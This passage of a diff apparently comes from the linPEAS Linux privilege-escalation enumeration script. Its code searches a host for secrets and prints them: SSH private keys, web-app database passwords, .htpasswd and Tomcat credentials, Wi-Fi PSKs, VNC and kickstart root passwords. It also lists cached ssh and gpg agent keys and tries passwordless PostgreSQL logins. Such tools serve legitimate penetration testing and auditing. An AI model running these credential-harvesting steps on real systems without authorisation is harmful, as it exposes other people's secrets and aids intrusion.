"s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi - echo "" - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi +if [ "$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Mongo Files (limit 70)" + echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; +fi + + +if [ "$PSTORAGE_APACHE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Apache Files (limit 70)" + echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" + print_3title 'PHP exec extensions' + grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Tomcat Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing FastCGI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Http conf Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Htpasswd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PHP Sessions Files (limit 70)" + ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions + if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Wordpress Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Drupal Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Moodle Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Supervisord Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cesi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Rsync Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_HOSTAPD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Hostapd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Wifi Connections Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Anaconda ks Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing VNC Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Ldap Files (limit 70)" + echo "The password hash is from the {SSHA} to 'structural'" + if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing OpenVPN Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; +fi + + +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +writable_agents=$(find $folder_path -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')') + +if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SSH Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; +fi + + +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi + +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then + print_3title "Listing gpg keys cached in gpg-agent" + gpg-connect-agent "keyinfo --list" /bye + echo "" +fi +if [ "$writable_agents" ]; then + print_3title "Writable ssh and gpg agents" + printf "%s\n" "$writable_agents" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" - #-- SI) Kerberos +if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PAM Auth Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i "auth" | grep -Ev "^#|^@" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +#-- SI) Passwords inside pam.d +pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#") +if [ "$pamdpass" ] || [ "$DEBUG" ]; then + print_2title "Passwords inside pam.d" + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing NFS Exports Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; +fi + + +#-- SI) Kerberos +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then print_2title "Searching kerberos conf files and tickets" print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" @@ -2708,168 +2781,222 @@ if echo $CHECKS | grep -q SofI; then klist 2>/dev/null || echo_not_found "klist" echo "" - print_2title "Analyzing Knockd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; 